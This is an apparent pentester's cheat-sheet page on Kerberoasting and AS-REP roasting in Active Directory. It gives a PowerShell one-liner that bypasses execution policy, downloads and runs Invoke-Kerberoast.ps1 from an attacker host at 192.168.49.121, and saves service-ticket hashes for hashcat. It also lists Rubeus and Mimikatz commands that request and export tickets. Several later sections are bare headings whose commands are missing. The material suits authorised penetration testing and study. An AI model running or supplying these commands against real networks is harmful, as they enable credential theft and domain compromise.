Roasting

Kerberoasting

https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/arrow-up-right

From Windows Shell

PowerShell One-Liner

  • Downloads Invoke-Kerberoast.ps1 from Kali, executes it, and saves output to file for hashcat reversing

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

Rubeus

Get-NetUser -SPN | select cn
Request-SPNTicket
Rubeus.exe kerberoast /format:hashcat > Hash1

Mimikatz

kerberos::ask /target:SPN
kerberos::list /export
  • No pass or admin required:

kerberos::list
kerberos::list /export

From Kali

No Passwords, Known-Good Users

With Full Creds

More Kerberos in-depth:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4aarrow-up-right

https://www.youtube.com/watch?v=beRDcvBwTBwarrow-up-right

AS-Rep Roasting

  • More rare than kerberoasting because something has to be set manually, namely the ‘no preauth required’ has to be unchecked on the account, meaning it doesn't need to use kerberos to request

  • or without any password!

  • Or from a list

  • If you've added to hosts file you won't need the IP written explicitly

Last updated